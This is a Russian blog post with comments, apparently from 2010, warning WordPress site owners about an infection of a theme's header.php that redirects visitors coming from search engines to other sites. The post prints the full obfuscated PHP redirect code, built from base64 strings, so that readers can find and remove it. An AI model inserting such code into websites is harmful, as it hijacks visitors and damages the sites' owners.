16 Февраль 2010

Заломали

Filed under: Блогинг — Tags: wordpress, вирус, дыра, редирект — Pion2er @ 12:47

Сегодня у Костика на сайте Steinar.ru обнаружили в файле header.php код вируса, он перенаправлял посетителей, которые пытались перейти на этот сайт из Google на на другие левые сайты типа этого "http://magik-tunes.com/?&wmid=112". Самое интересное, что если просто в адресной строке набрать адрес его сайта, то все нормально, но если пришли с поисковика, то перекинет на один из этих сайтов.

Вот код вируса:

<? function _879214760($i){$a=Array('SFRUUF9SRUZFUkVS','aHR0cDovL3J1em9uZXh4eC5jb20vP3VpZD1jN2FjOTA0MDhmZWNlYWNkZDg5MjBkOGZlMmUzNGE0NA==','Z29vZ2xlLnJ1','eWEucnU=','eWFuZGV4LnJ1','bWFpbC5ydQ==','cmFtYmxlcg==','TG9jYXRpb246IA==');return base64_decode($a[$i]);} ?><?php __0($_SERVER[_879214760(0)],_879214760(1));function __0($_0,$_1){if($_0!=false){$_2=array(_879214760(2),_879214760(3),_879214760(4),_879214760(5),_879214760(6));foreach($_2 as $_3){if(strstr($_0,$_3)){header(_879214760(7) .$_1);die();}}}} ?>

Так что рекомендую всем кто держит сайты проверить файлик header.php на наличие в самом начале подобного текста и если он там, то удалить его. Главный вопрос, который меня мучает - это как им падлам удалось его туда запихнуть? Я понимаю, если бы он не обновлял движок и сидел бы на доисторической версии, но у него установлена самая на сегодня последняя версия WordPress 2.9.1.

5 комментариев   |  36 просмотров

 Страница для печати

Похожие записи:

• Японский городовой 2.6.5
• Темы для wordpress
• РЕВАК – сайт резюме и вакансий на WordPress
• Плагин WP-PRINT
• Обновление wordpress до 2.7 версии
• Обновился
• Новый Жека-блог
• Ееее! У меня появился еще один блог!
• Гребанные вирусы
• Автономный сплог

5 комментариев »

1. [...] на сайт не ругались. Особый цимес в том, что по словам других пострадавших, функция эта проявляет себя только при переходе с [...]

   Pingback by » Свинья на Блогге или function _879214760
   — 9 апреля 2010 @ 0:34

2. Нашли, откуда это взялось? Я у себя вот только недавно детектировал. Но судя по падению статистики, эта дрянь висела с декабря-января. Причем ВордПресс – отнюдь не самый последний.

   Comment by человек-хэмингуэй
   — 9 апреля 2010 @ 0:49

3. Увы нет Но Яндекс после этого сайт выкинул из индекса, сейчас воде как плавно возвращается, но очень неохотно. Откуда взяться эта дрянь могла увы не знаю, возможно он редко обновлял вордпресс

   Comment by Pion2er
   — 9 апреля 2010 @ 11:05

4. Обновлять Вордпресс постоянно – тоже удовольствие сомнительное. Учитывая, что все нужные функции я уже имею, а движок жрёт всё больше и больше.

   Поставил права на файлы темы, чтобы нельзя было из админки обновить. Подозреваю дрянь через неё и просочилась.

   Comment by человек-хэмингуэй
   — 9 апреля 2010 @ 12:33

5. Я обновляю постоянно, но не из-за дополнительных и фич и функций, а для безопасности. Ведь чем популярнее движок, тем больше желающих его заломать, что с успехом им и удается. Да и обновлять его очень просто, нужно лишь нажать на одну кнопку.

   Не знаю поможет ли, но лишней безопасности не бывает.

   Comment by Pion2er
   — 9 апреля 2010 @ 13:19

RSS feed for comments on this post. TrackBack URL

Leave a comment

You must be logged in to post a comment.